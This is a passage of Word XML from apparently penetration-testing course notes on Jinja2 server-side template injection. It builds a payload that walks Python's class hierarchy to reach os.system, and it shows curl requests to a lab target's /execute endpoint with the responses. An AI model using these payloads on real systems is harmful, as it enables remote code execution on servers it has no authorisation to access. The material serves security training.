        <w:t>__import__ &lt;built-in function __import__&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="464975C1" wp14:textId="14F2F27E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>It seems we have reached the import function by walking the hierarchy. This means we can load os and use the system function to execute code all coming from a string object, as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="4D7F076D" wp14:textId="555D5B6B">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2E4B2F6A" wp14:textId="72123309">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&gt;&gt;&gt; ''.__class__.__mro__[1].__subclasses__()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>[215]()._module.__builtins__['__import__']('os').system('echo RCE from a string object')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>RCE from a string object</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="5EA22841" wp14:textId="201C981E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Returning to our vulnerable web application, let's see how we can repeat the same process and develop an RCE payload. Remember that the below payloads can be submitted to the application via the browser as is or via cURL after being URL encoded.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="1583A712" wp14:textId="5330D95D">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="6E9A02B8" wp14:textId="7D7BBA68">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3B879E53" wp14:textId="6FAF337C">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 ''.__class__ }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="795E756D" wp14:textId="515974C0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Curl - Interacting with the Target</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="495AD286" wp14:textId="3EA1AE91">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl - Interacting with the Target </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="01423509" wp14:textId="52A8D19E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ curl -gs "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:&lt;PORT&gt;/execute?cmd=%7B%7B%20%27%27.__class__%20%7D%7D"</w:t>
      </w:r>
      <w:r>
        <w:br/>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r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div id="desktop"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div class="window" data-title="Run"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;form action="/execute" method="get"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;a&gt;C:\&gt;&lt;input type="text" name="cmd" id="command"&gt;&lt;/a&gt;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&lt;a&gt;&amp;lt;class &amp;#39;str&amp;#39;&amp;gt;&lt;/a&gt;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&lt;input type="submit" value="execute"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="128CC987" wp14:textId="6EEE5F4F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="3D08911E" wp14:textId="20D3A8C6">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110CBE6B" wp14:textId="4A05E452">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 ''.__class__.__mro__ }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="6C51439D" wp14:textId="0F5342EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Curl - Interacting with the Target</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="1C0C7B82" wp14:textId="4D105BD0">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl - Interacting with the Target </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="1D20DFA8" wp14:textId="6388A03E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ curl -gs "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:&lt;PORT&gt;/execute?cmd=%7B%7B%20%27%27.__class__.__mro__%20%7D%7D"</w:t>
      </w:r>
      <w:r>
        <w:br/>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r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div id="desktop"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div class="window" data-title="Run"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;form action="/execute" method="get"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;a&gt;C:\&gt;&lt;input type="text" name="cmd" id="command"&gt;&lt;/a&gt;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&lt;a&gt;(&amp;lt;class &amp;#39;str&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;object&amp;#39;&amp;gt;)&lt;/a&gt;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&lt;input type="submit" value="execute"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="6CE6B7F6" wp14:textId="28B90A83">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We are interested in the second item, so the payload should become:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="03947753" wp14:textId="70925ACE">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4F36ACF9" wp14:textId="436D9AD4">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 ''.__class__.__mro__[1] }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="3CAA10C9" wp14:textId="4E237293">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl - Interacting with the Target </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="1253DA18" wp14:textId="363FDECD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ curl -gs "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:&lt;PORT&gt;/execute?cmd=%7B%7B%20%27%27.__class__.__mro__%20%7D%7D"</w:t>
      </w:r>
      <w:r>
        <w:br/>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r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div id="desktop"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div class="window" data-title="Run"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;form action="/execute" method="get"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;a&gt;C:\&gt;&lt;input type="text" name="cmd" id="command"&gt;&lt;/a&gt;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&lt;a&gt;&amp;lt;class &amp;#39;object&amp;#39;&amp;gt;&lt;/a&gt;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&lt;input type="submit" value="execute"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="210C9891" wp14:textId="5627B857">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let us start walking down the hierarchy, as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="1B8BE132" wp14:textId="057EAE16">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4A5BFC19" wp14:textId="05115EAD">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 ''.__class__.__mro__[1].__subclasses__() }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="5B16843A" wp14:textId="17AD4ACA">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl - Interacting with the Target </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="6DBCA241" wp14:textId="2EF158B2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ curl -gs "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:&lt;PORT&gt;/execute?cmd=%7B%7B%20%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%20%7D%7D"</w:t>
      </w:r>
      <w:r>
        <w:br/>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r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div id="desktop"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div class="window" data-title="Run"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;form action="/execute" method="get"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
